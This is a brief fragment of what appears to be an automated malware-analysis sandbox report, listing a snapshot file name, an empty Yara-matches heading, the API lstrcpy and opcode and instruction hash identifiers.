                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: a850a7e5ed72b0bb27d1bfac9c252af4a5a53a90ad6aee72d6a55d070e261114
                                                      • Instruction ID: 9bfd9ade0d3caeff15c84833d4da706104922a33fcc114d61653c55b0e652f2d
                                                      • Opcode Fuzzy Hash: a850a7e5ed72b0bb27d1bfac9c252af4a5a53a90ad6aee72d6a55d070e261114
                                                      • Instruction Fuzzy Hash: 551133B4A117039BD7249F35D858926BBF9FF847053084A2DD89AD3B40EB70E501DFA0